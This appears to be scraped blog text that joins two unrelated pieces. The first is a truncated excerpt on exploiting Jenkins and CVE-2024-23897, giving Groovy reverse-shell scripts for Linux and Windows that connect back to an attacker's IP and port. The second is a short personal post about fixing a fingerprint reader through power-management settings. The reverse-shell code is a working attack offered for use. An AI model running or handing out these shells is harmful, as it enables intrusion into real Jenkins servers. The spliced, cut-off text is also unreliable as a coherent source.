Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea...
The fingerprint reader on my laptop was not working properly since last couple of month. Suspecting after some update from Microsoft. It was not completely working, sometimes it work perfectly and often sometimes not. Especially after my laptop goes sleep.
So i uninstalled and reinstalled the driver with the latest update, did some googling and couldn't get a solution. However, i though of checking the power management settings. And unchecked the "Allow the computer to turn off this device to save power" under the device's power management (From Device Manager). The issue is fixed and the fingerprint reader is working fine.
Thought of sharing this as some of my friends had the same issue. Also i can see a lot of queries in the internet regarding this fingerprint reader malfunction. Always keep your OS and the drivers up to date and don't download any third party tools to fix issues with your machine.